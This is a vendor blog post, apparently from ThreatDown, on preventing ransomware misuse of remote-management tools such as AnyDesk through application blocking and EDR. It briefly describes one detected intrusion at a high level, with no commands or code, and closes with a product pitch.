**Preventing RMM ransomware attacks with Application Block and EDR**

To prevent ransomware gangs from misusing RMM tools, businesses can adopt two strategies: blocking unnecessary RMM tools using application blocking software and utilizing EDR to detect suspicious RMM tool activity.

For instance, by employing applications like ThreatDown’s Application Block, businesses can prevent the use of non-essential RMM applications.

For necessary tools, such as AnyDesk, the EDR/MDR layers within ThreatDown Bundles can offer an additional layer of protection in case of an infection.

Consider a real example where ransomware attackers used AnyDesk to establish a Command and Control (C&C) server. In one case, a threat actor infiltrated a customers environment by exploiting an unpatched server with open ports exposed to the internet. AnyDesk was installed by the threat actor afterward, as indicated in the EDR alert below. Such activity is typical of what our Threat Intel teams observe just before the widespread encryption carried out in ransomware attacks.

EDR detecting malicious RMM tool usage, with relevant MITRE techniques

After investigating the alert, however, a customer can quickly isolate the affected endpoint to prevent encryption. Alternatively, the ThreatDown MDR service can identify the alert and offer guidance on remediation.

**Stop ransomware RMM attacks today**

Much like other Living Off the Land tools designed to facilitate IT administration, RMM tools are now double-edged swords.

Whether using RMM tools for initial access, post-infection ransomware deployment, or a combination of the two, ransomware attackers are upping the sophistication of their attacks. However, with ThreatDown, organizations can effectively curtail the abuse of RMM tools through technologies like Application Block and EDR.

Discover the difference with ThreatDown Bundles and elevate your organization’s defense against cyber threats. Get in touch for a free trial and experience the benefits of a simplified, yet robust, security framework.

Tag

#mac